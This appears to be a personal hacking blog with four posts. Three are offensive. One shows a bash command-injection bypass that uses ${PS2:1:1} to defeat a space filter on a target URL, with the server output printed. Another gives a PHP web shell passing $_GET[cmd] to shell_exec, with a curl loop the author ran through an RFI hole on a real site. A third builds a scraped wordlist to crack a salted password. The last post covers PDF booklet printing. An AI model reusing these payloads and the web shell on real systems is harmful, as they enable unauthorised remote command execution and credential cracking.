Too Cool for Internet Explorer

giovedì 24 luglio 2014

Bypassing bash command injections restrictions

I recently needed a way to execute arbitrary bash commands without using spaces during the injection.
Assume this example blackbox scenario, where we found some bash command injetion, but some commands are filtered/not executed:
$(id):
$ curl "http://target/path/vulnerable.php?vulnvar=$(id)"
uid=48(apache) gid=48(apache) groups=14(uucp),48(apache),501(nagios),600(nagiocmd)
$(ls):
$ curl "http://target/path/vulnerable.php?vulnvar=$(ls)"
vulnerable.php
index.php
$(cat /etc/passwd):
$ curl "http://target/path/vulnerable.php?vulnvar=$(cat /etc/passwd)"
[no output]
(space filtered? or no permissions + stderr not forwarded? lets check it out..) $(ls >/tmp/test):
$ curl "http://target/path/vulnerable.php?vulnvar=$(ls >/tmp/test)"
[no output]
$(cat</tmp/test):
$ curl "http://target/path/vulnerable.php?vulnvar=$(cat</tmp/test)"
[no output]
(maybe the ls before was not executed) $(ls>/tmp/test):
$ curl "http://target/path/vulnerable.php?vulnvar=$(ls>/tmp/test)"
[no output]
$(cat</tmp/test):
$ curl "http://target/path/vulnerable.php?vulnvar=$(cat</tmp/test)"
vulnerable.php
index.php
we got it! it's the space that is filtered out and prevents our injection to be successful.
but how we manage to execute a command that needs a parameter without using a space?
The solution is to get out a space in some "bash way", and here the Shell Parameter expansion comes to play. With this functionality we can extract a substring from a arbitrary variable:
${parameter:offset:length}

Expands to up to length characters of parameter starting at the character specified by offset. If length is omitted, expands to the substring of parameter starting at the character specified by offset. length and offset are arithmetic expressions (see Shell Arithmetic). This is referred to as Substring Expansion.

First we need to fine some variable containing a 'space' char, so search it in the current environment:
$(declare>/tmp/test):
$ curl "http://target/path/vulnerable.php?vulnvar=$(declare>/tmp/test)"
[no output]
$(cat</tmp/test):
$ curl "http://target/path/vulnerable.php?vulnvar=$(cat</tmp/test)"
[...]
LESSOPEN='|/usr/bin/lesspipe.sh %s'
LINES=39
MAIL=/var/spool/mail/root
MAILCHECK=60
OLDPWD=/root
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/opt/ruby192/bin:/root/bin
PIPESTATUS=([0]="0")
PPID=8851
PRELINKING=yes
PRELINK_FULL_TIME_INTERVAL=14
PRELINK_NONRPM_CHECK_INTERVAL=7
PRELINK_OPTS=-mR
PROMPT_COMMAND='printf "\033]0;%s@%s:%s\007" "${USER}" "${HOSTNAME%%.*}" "${PWD/#$HOME/~}"'
PS1='[\u@\h \W]\$ '
PS2='> '
PS4='+ '
[...]

so in this case we can use LESSOPEN, PS2, PS4 or some other variable, lets take PS2 for semplicity, and extract its space char:
${PS2:1:1}

now we can write arbitrary commands with parameters (and spaces) substituting each space with the ${PS2:1:1} string: $(ls${PS2:1:1}-l${PS2:1:1}/):
$ curl "http://target/path/vulnerable.php?vulnvar=$(ls${PS2:1:1}-l${PS2:1:1}/)"
drwxr-xr-x   2 root   root    4096 May  7 11:20 bin
drwxr-xr-x   4 root   root    3072 May 30  2012 boot
drwxr-xr-x   6 nagios neteye  4096 Aug 21  2013 data
drwxr-xr-x  10 root   root    3960 Jun 26 18:05 dev
drwxr-xr-x 126 root   root   12288 Jul 23 04:04 etc
drwxr-xr-x   5 root   root    4096 Jun 23 11:38 home
-rw-r--r--   1 root   root      31 Feb  4  2011 ks.log
drwxr-xr-x  14 root   root   12288 May  7 11:20 lib
drwx------   2 root   root   16384 Sep 25  2010 lost+found
drwxr-xr-x   3 root   root    4096 Jun 13 14:12 media
drwxr-xr-x   2 root   root    4096 Apr 20  2012 misc
drwxr-xr-x   2 root   root    4096 Aug 21  2013 mnt
dr-xr-xr-x   2 root   root    4096 May 10  2011 net
drwxr-xr-x   5 root   root    4096 Mar 26 17:20 opt
dr-xr-xr-x 131 root   root       0 Jun 13 14:12 proc
drwxr-x---  58 root   root   16384 Jul 24 09:26 root
drwxr-xr-x   2 root   root   12288 May  7 11:20 sbin
drwxr-xr-x   2 root   root    4096 May 11  2011 selinux
drwxr-xr-x   2 root   root    4096 May 11  2011 srv
drwxr-xr-x  11 root   root       0 Jun 13 14:12 sys
drwxrwxrwt   7 root   root   28672 Jul 24 11:47 tmp
drwxr-xr-x  15 root   root    4096 Oct 19  2011 usr
drwxr-xr-x  30 root   root    4096 Jul 18 09:06 var

happy hacking ;)

venerdì 31 agosto 2012

a (very) basic remote php shell

Hi folks, i'm finally back ;)

I know, there are several php-shells out there, but i like to build all by my own, thats the scope and the fun part.
So yesterday, exploiting some site with a RFI vuln, i reused my favorite "shell over http" variant ;)

here the php code to upload:
$ cat Hacking/image.php.jpg
< ?php
if($_GET[cmd] != "") {
    if ($_GET[plain] != "") {
        echo shell_exec($_GET[cmd]);
    } else {
        echo "
".shell_exec($_GET[cmd])."
"; } } ?> $

So we can use it with no "plain" argument from the browser, simply adding the "cmd" argument, and with "plain=1" argument from the terminal:
$ while [ 1 ]; do echo -n "$ " && read CMD && CMD2=`echo $CMD | sed -e 's/ /+/g'` && curl http://imavulnerablesite.com/vulnerable.php?parameters&plain=1&cmd=$CMD2+2%3E%261; done
$ id
uid=48(apache) gid=48(apache) groups=14(uucp),48(apache)
$ ls -la
total 136
drwxr-xr-x  7 root root  4096 Aug 30 14:49 .
drwxr-xr-x 13 root root  4096 May  9 14:55 ..
-rw-r--r--  1 root root    36 Apr  3 17:43 .htaccess
[...]

Happy hacking ;)

giovedì 16 aprile 2009

HowTo: A simple way to create a wordlist/dictionary

Hi all,

Last evening I got the need to build a huge wordlist from my own, because I need to crack a salted password.
I started with the assumption, that that the password will likely be an italian, a german or an english word.
So I started searching the web for a huge amount of words to collect, and found a interresting website full of (old) books in (zipped) txt format. Nice.
After a quick look I noticed that it was going to be boring to download each book manually, so I started to read the wget manual, and realized what for a great application it is =)
(Note: I'm not going to explain what every command parameter means, if you don't understand, RTFM ;) )

$ wget -r -nd -N -erobots=off -A.zip \
 -I cyberbooks \
 "http://www.cyberbooks.it/cyberbooks/autori/ind_a.htm"


That downloaded me all linked zip files on the page (and all subpages) in the current directory. Then I unzipped them:

$ for i in `ls`; do unzip -o $i; done;


And finally I cancelled the temporary files and kept only the txt files:

$ find . -maxdepth 1 -type f \! -name '*txt' \
 -exec rm -rf {} \;


Now, being sure that no other files then txt where in the directory, I put them all together, removed some unneeded characters, put each word on a new line, sorted them alphabetically, removed unprintable characters and kept only unique entries:

$ cat *.txt | sed -e 's/://g' -e 's/\.//g'\
 -e 's/!//g' -e 's/?//g' -e 's/-//g' \
 -e 's/;//g' -e 's/,//g' -e 's/*//g' \
 -e 's/(//g' -e 's/)//g' | \
 awk '{printf "%s",$0}!//{print}' | \
 sed -e 's/ /\n/g' | sort -u | \
 strings > test.txt


this method resulted in a wordlist, but many garbage was around the words, so I decided to take the opposite approach, that means not to exclude unwanted characters/string, but to keep only they what I needed, and discard the others. For this operation I used the 'tr' command.

$ cat *.txt | tr ' ' '\n' | \
 tr -d -c '[A-Za-z][\300-\374]\012\047' \
 | sort -u > part01.txt
$ cat part01.txt | wc -l
564486


Nice. A half million words in my list. But I needed more, john the ripper checks them in a couple of milliseconds, and no password was cracked :-(

So lets fetch more data from the internet.. I took a famous italian news portal repubblica.it. And downloaded the whole portal.. some gigs of html files ^^

$ wget -r -nd -N -erobots=off \
 -R.jpg,.gif,.png,.js,.css \
 "http://www.repubblica.it/index.html"


I made a little script to handle the processing of each file, because some file had a strange name and the cat * gave me errors.

$ cd repubblica/
$ for i in `ls`; do \ 
 echo "processing $i" && cat "$i" | \
 tr -c '[A-Za-z][\300-\374]\012\047' ' ' | \
 tr ' ' '\n' >> ../tmp02.txt; \
 done;
[...]
$ cat ../tmp02.txt | sort -u > ../part02.txt


Noticed that only a little improvement was done, I decided to put a list of portals in a file, and let wget download them all.
Then I repeated the same operation for each portal, and got a nice wordlist:
$ cat part0* | sort -u > final_wordlist.txt
$ wc -l final_wordlist.txt
827624 final_wordlist.txt


The opportunities now are infinite, just download the whole internet and make a big wordlist.. then send it to me =)

happy cracking ;)

U238 alias 0xF0rD.

domenica 7 dicembre 2008

Creating multipage print-ready books from PDF

Today I got the need to print a manual in pdf format downloaded from the internet, and realized that printing all pages in A4 format was too paper and size expensive. So I decided to opt for a multipage layout, but until today I always printed the pages in sequential order, and this time I needed a to create a double-sided two-page paginated spread.



This can be easily done with opensource psutils package, and lets you print multiple-page documents such as booklets and pamphlets.

the command simply is

 $ pdf2ps $input - | psbook | psnup -2 | ps2pdf14 -sPAPERSIZE=a4 - $output 

where $input is the file with the pages in sequential order, and $output the printable PDF generated.